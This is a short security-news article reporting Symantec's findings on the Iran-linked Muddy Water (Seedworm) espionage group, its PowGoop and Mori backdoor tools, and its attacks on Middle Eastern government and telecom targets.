22 October 2020

Muddy Water hackers target Middle East governments, telecoms


Muddy Water hackers target Middle East governments, telecoms

A cyber espionage group known as Muddy Water (Seedworm) thought to be working on behalf of the Iranian government is continuing to target entities in the Middle East. In recent months, Symantec’s Threat Hunter team has observed multiple hacking attempts against government organizations and telecommunications operators in Iraq, Kuwait, Turkey and the United Arab Emirates.

In a recent wave of attacks the group has been deploying a known Seedworm backdoor (Backdoor.Mori), and researchers said that many of organizations attacked by Muddy Water have been also targeted by the relatively new PowGoop malware, suggesting that the group has added the tool to its bag of tricks. However, Symantec says that at present it “can only establish a medium-confidence link between PowGoop and Seedworm.”

“In the majority of recent infections, PowGoop appears to have been deployed via a remote execution tool known as Remadmin. This tool is used to execute PowerShell to read and decode the contents of a file which is used to execute the contents in memory,” Symantec said.

Additionally, during PowGoop activity, the research team also observed the attackers downloading tools and some unknown content from GitHub repos.

Symantec says it detected attacks involving PowGoop against organizations in government, technology, telecoms, oil and gas, real estate, and education sectors in Iraq, Afghanistan, Israel, Turkey, Azerbaijan, Georgia, Cambodia, and Vietnam.

In the recent attacks the researchers observed the hackers stealing credentials by dumping the contents of the Windows Registry to files in the same directories as Seedworm backdoors, and using Quarks password dumper (Quarks PwDump) to steal local account password hashes. The attackers also established tunnels to their own infrastructure with the help of open-source tools like Secure Sockets Funneling (SSF) and Chisel, which allowed the malicious actor to configure local and remote port forwarding as well as copying files to compromised machines.

“Seedworm has been one of the most active Iran-linked groups in recent months, mounting apparent intelligence-gathering operations across the Middle East. While the connection between PowGoop and Seedworm remains tentative, it may suggest some retooling on Seedworm’s part. Any organizations who do find evidence of PowGoop on their networks should exercise extreme caution and perform a thorough investigation,” the researchers warned.

Back to the list

Latest Posts

Vulnerability summary for the week: November 27, 2020

Vulnerability summary for the week: November 27, 2020

A weekly vulnerability digest.
27 November 2020
Personal data of 16M Brazilian COVID-19 patients exposed due to a password leak

Personal data of 16M Brazilian COVID-19 patients exposed due to a password leak

An employee of the Albert Einstein Hospital uploaded on his personal GitHub account a spreadsheet containing usernames, passwords, and access keys to electronic systems of the Ministry of Health.
27 November 2020
Sophos security breach exposes customers’ data

Sophos security breach exposes customers’ data

The company said that the incident affected "only a small subset of customers."
27 November 2020